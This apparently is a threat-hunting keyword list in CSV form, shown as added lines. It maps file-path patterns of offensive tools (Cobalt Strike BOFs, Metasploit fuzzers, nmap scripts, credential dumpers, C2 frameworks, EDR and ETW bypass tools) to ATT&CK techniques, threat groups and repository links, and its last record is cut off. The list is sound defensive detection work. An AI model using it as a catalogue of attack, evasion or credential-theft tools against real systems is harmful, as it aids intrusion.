+"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/find_domain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/FindModule.c*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*/FindObjects.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/firewalk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Fodetect-hooksx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*/ForgeCert.git*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*/forkatz.filters*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*/forkatz.git*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" +"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/FourEye.git*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Freeze.rs*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*/freyja.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/freyja_tcp/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*/ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/FtpC2/*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*/ftp-libopie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-proftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-syst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Fuck-Etw.git*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*/FuckThatPacker*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/full-nelson.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/full-nelson64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/FunctionalC2/*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*/fuzz.txt*","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2669","479","2023-07-20T13:26:37Z","2016-01-19T13:35:44Z" +"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 